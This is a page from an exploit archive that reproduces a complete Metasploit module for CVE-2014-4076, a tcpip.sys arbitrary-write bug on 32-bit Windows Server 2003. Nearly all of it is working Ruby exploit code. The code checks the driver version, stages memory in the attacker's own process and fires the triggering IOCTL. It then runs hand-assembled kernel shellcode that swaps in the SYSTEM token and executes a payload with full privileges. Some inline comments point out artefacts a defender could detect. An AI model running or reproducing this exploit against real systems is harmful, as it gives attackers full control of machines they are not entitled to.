
Windows tcpip.sys Arbitrary Write Privilege Escalation Exploit

🗓️ 06 Feb 2015 00:00:00 · Reported by metasploit · Type: zdt

Windows tcpip.sys Arbitrary Write Privilege Escalation Exploit. Allows an attacker to inject controlled memory into the kernel.

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'
require 'msf/core/exploit/local/windows_kernel'
require 'rex'

class Metasploit3 < Msf::Exploit::Local
  # Local privilege escalation for CVE-2014-4076 (arbitrary write in tcpip.sys).
  # Scope as declared below: native 32-bit Windows Server 2003 SP2 only, from an
  # existing meterpreter session. The observable steps a defender can key on are
  # annotated inline: the user-mode open of \\.\tcp, the IOCTL that triggers the
  # bug, and the tcpip.sys file-version gate used by #check.
  Rank = AverageRanking

  # The helpers used below (open_device, token_stealing_shellcode, file?,
  # file_version, is_system?, execute_shellcode, get_env) come from these mixins;
  # the exact mixin-to-method mapping is not verified in this file.
  include Msf::Exploit::Local::WindowsKernel
  include Msf::Post::File
  include Msf::Post::Windows::FileInfo
  include Msf::Post::Windows::Priv
  include Msf::Post::Windows::Process

  # Module metadata only; no runtime behaviour lives here.
  def initialize(info={})
    super(update_info(info, {
      'Name'           => 'Windows tcpip.sys Arbitrary Write Privilege Escalation',
      'Description'    => %q{
        A vulnerability within the Microsoft TCP/IP protocol driver tcpip.sys,
        can allow an attacker to inject controlled memory into an arbitrary
        location within the kernel.
      },
      'License'       => MSF_LICENSE,
      'Author'        =>
        [
          'Matt Bergin <level[at]korelogic.com>', # Vulnerability discovery and PoC
          'Jay Smith <jsmith[at]korelogic.com>' # MSF module
        ],
      'Arch'          => ARCH_X86,
      'Platform'      => 'win',
      'SessionTypes'  => [ 'meterpreter' ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'thread',
        },
      # Single target. The hash holds kernel structure offsets as one-byte
      # strings; `target` is passed to token_stealing_shellcode in #exploit,
      # which presumably reads these keys — confirm in the WindowsKernel mixin.
      'Targets'       =>
        [
          ['Windows Server 2003 SP2',
            {
              '_KPROCESS' => "\x38",
              '_TOKEN' => "\xd8",
              '_UPID' => "\x94",
              '_APLINKS' => "\x98"
            }
          ]
        ],
      'References'    =>
        [
          ['CVE', '2014-4076'],
          ['URL', 'https://www.korelogic.com/Resources/Advisories/KL-001-2015-001.txt']
        ],
      'DisclosureDate'=> 'Nov 11 2014',
      'DefaultTarget' => 0
    }))

  end

  # Decides whether the host looks exploitable without triggering anything:
  # native 32-bit, \\.\tcp openable from this session, and tcpip.sys present as
  # the Server 2003 build (5.2.3790) with a file revision below 5440.
  # Returns Exploit::CheckCode::Safe, ::Unknown (driver file not found) or
  # ::Vulnerable.
  def check
    # WOW64 and x64 are reported Safe here; #exploit repeats the same test with
    # more specific failure messages.
    # NOTE(review): `or` (low precedence) and the missing /i on /x64/ differ
    # from the `elsif`/regex style used in #exploit; behaviour is the same for
    # the values sysinfo reports, but `||` and /x64/i would be consistent.
    if sysinfo["Architecture"] =~ /wow64/i or sysinfo["Architecture"] =~ /x64/
      return Exploit::CheckCode::Safe
    end

    # Opening the TCP device from an ordinary user session is the first
    # observable step of this chain; if it cannot be opened there is no path.
    handle = open_device('\\\\.\\tcp', 'FILE_SHARE_WRITE|FILE_SHARE_READ', 0, 'OPEN_EXISTING')
    return Exploit::CheckCode::Safe unless handle

    session.railgun.kernel32.CloseHandle(handle)

    # NOTE(review): `<<` appends in place to the String returned by get_env;
    # if get_env ever returns a cached/shared object this would mutate it —
    # confirm, or use `+`.
    file_path = get_env('WINDIR') << "\\system32\\drivers\\tcpip.sys"
    unless file?(file_path)
      return Exploit::CheckCode::Unknown
    end

    major, minor, build, revision, branch = file_version(file_path)
    vprint_status("tcpip.sys file version: #{major}.#{minor}.#{build}.#{revision} branch: #{branch}")

    # Version gate: 5.2.3790 is the Server 2003 build; revision 5440 is treated
    # as the first fixed tcpip.sys (presumably the MS14-070 update — confirm
    # against the vendor bulletin). A patched driver therefore reports Safe.
    if ("#{major}.#{minor}.#{build}" == "5.2.3790" && revision < 5440)
      return Exploit::CheckCode::Vulnerable
    end

    return Exploit::CheckCode::Safe
  end

  # Runs the full chain: preconditions, user-mode staging, the IOCTL trigger,
  # a SYSTEM check, then payload execution in the now-elevated process. Every
  # failure path goes through fail_with. The device handle opened here is
  # deliberately never closed (see the commented CloseHandle line).
  def exploit
    if is_system?
      fail_with(Exploit::Failure::None, 'Session is already elevated')
    end

    if sysinfo["Architecture"] =~ /wow64/i
      fail_with(Failure::NoTarget, "Running against WOW64 is not supported")
    elsif sysinfo["Architecture"] =~ /x64/
      fail_with(Failure::NoTarget, "Running against 64-bit systems is not supported")
    end

    # Re-runs #check (which opens and closes the device once on its own) so the
    # version gate is enforced even if the operator skipped the check step.
    unless check == Exploit::CheckCode::Vulnerable
      fail_with(Exploit::Failure::NotVulnerable, "Exploit not available on this system")
    end

    handle = open_device('\\\\.\\tcp', 'FILE_SHARE_WRITE|FILE_SHARE_READ', 0, 'OPEN_EXISTING')
    if handle.nil?
      fail_with(Failure::NoTarget, "Unable to open \\\\.\\tcp device")
    end

    print_status("Storing the shellcode in memory...")
    # Process object for the session's own process (no pid given); used for the
    # memory writes below and as the pid for execute_shellcode at the end.
    this_proc = session.sys.process.open

    # Reserve+commit 0x4000 bytes of PAGE_EXECUTE_READWRITE memory at base
    # 0x1000 in the current process (-1 is the current-process pseudo-handle).
    # The NTSTATUS is not checked; success is inferred from the writable? probe.
    session.railgun.ntdll.NtAllocateVirtualMemory(-1, [0x1000].pack('V'), nil, [0x4000].pack('V'), "MEM_RESERVE|MEM_COMMIT", "PAGE_EXECUTE_READWRITE")

    unless this_proc.memory.writable?(0x1000)
      fail_with(Failure::Unknown, 'Failed to allocate memory')
    end

    # 32-byte input buffer for the IOCTL below; its layout is specific to this
    # driver version and is written verbatim to 0x1100.
    buf = "\x00\x04\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x02\x00\x00\x22\x00\x00\x00\x04\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00"

    # Kernel-mode payload: the mixin's token-stealing stub built from the
    # target offsets, followed by a hand-written epilogue that unwinds the
    # kernel stack so execution returns cleanly instead of crashing the host.
    sc  = token_stealing_shellcode(target, nil, nil, false)
    # move up the stack frames looking for nt!KiSystemServicePostCall
    sc << "\x31\xc9"                     # xor ecx, ecx
    sc << "\x89\xeb"                     # mov ebx, ebp
    # count_frames
    sc << "\x41"                         # inc ecx
    sc << "\xf7\x43\x04\x00\x00\x00\x80" # test dword [ebx+4], 0x80000000
    sc << "\x8b\x1b"                     # mov ebx, dword [ebx]
    sc << "\x75\xf4"                     # jne short count_frames
    sc << "\x49"                         # dec ecx
    # loop_frames
    sc << "\x49"                         # dec ecx
    sc << "\x89\xec"                     # mov esp, ebp
    sc << "\x5d"                         # pop ebp
    sc << "\x83\xf9\x00"                 # cmp ecx, 0
    sc << "\x75\xf7"                     # jne loop_frames
    sc << "\x31\xc0"                     # xor eax, eax
    sc << "\xc3"                         # ret

    # Staging writes in the session's own address space. 0x28, 0x38 and 0x2b lie
    # below the 0x1000 base that writable? verified; presumably they are mapped
    # because the allocation above was rounded down to page 0 (a mapping newer
    # Windows releases refuse), but nothing here checks that — confirm. The
    # IOCTL reads 0x1100 (its input buffer) and presumably the other locations,
    # so these writes must all complete, in this order, before the trigger.
    this_proc.memory.write(0x28, "\x87\xff\xff\x38")
    this_proc.memory.write(0x38, "\x00\x00")
    this_proc.memory.write(0x1100, buf)
    this_proc.memory.write(0x2b, "\x00\x00")
    this_proc.memory.write(0x2000, sc)

    print_status("Triggering the vulnerability...")
    # NtDeviceIoControlFile(FileHandle, Event, ApcRoutine, ApcContext,
    # IoStatusBlock, IoControlCode, InputBuffer, InputBufferLength,
    # OutputBuffer, OutputBufferLength): control code 0x00120028 sent to
    # \\.\tcp with the 32-byte input at 0x1100 and no output buffer. For
    # detection, this IOCTL arriving on \\.\tcp from a non-privileged user
    # process is the concrete artefact of this exploit.
    session.railgun.ntdll.NtDeviceIoControlFile(handle, nil, nil, nil, 4, 0x00120028, 0x1100, buf.length, 0, 0)
    #session.railgun.kernel32.CloseHandle(handle) # CloseHandle will never return, so skip it

    print_status("Checking privileges after exploitation...")

    # The only success signal is the token swap having taken effect on this
    # process; there is no other feedback from the kernel side.
    unless is_system?
      fail_with(Failure::Unknown, "The exploitation wasn't successful")
    end

    print_good("Exploitation successful!")
    # Runs the user-selected payload inside the now-elevated session process.
    unless execute_shellcode(payload.encoded, nil, this_proc.pid)
      fail_with(Failure::Unknown, 'Error while executing the payload')
    end
  end

end

#  0day.today [2018-01-05]  #
